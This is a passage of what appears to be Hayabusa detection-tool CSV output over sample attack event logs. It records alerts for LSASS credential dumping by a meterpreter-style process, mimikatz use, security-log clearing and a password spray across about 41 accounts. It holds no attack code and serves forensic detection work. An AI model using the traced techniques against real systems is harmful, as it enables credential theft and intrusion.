\\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-3FDE-5CC8-0000-0010142B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-3FDF-5CC8-0000-00103C480000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-0010014C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00101E4C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00104D520000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00100D550000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,../hayabusa-rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,../hayabusa-rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx 2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx 2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx 2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx 2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx 2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx 2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx 2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx 2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx 2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Evas,Security Log Cleared,User: jwrig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:02.847 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:celgee/mtoussain/psmith/jleytevidal/sanson/eskoudis/edygert/drook/cragoso/tbennett/bking/cdavis/ebooth/ssims/cfleener/jwright/jlake/thessman/econrad/jorchilles/bgreenwood/zmathis/rbowes/Administrator/bhostetler/sarmstrong/lpesce/lschifano/dpendolino/kperryman/jkulikowski/wstrzelec/mdouglas/gsalinas/baker/smisenar/dmashburn/bgalbraith/cspizor/cmoody/melliott IpAddress:172.16.144.128 timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,- 2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: 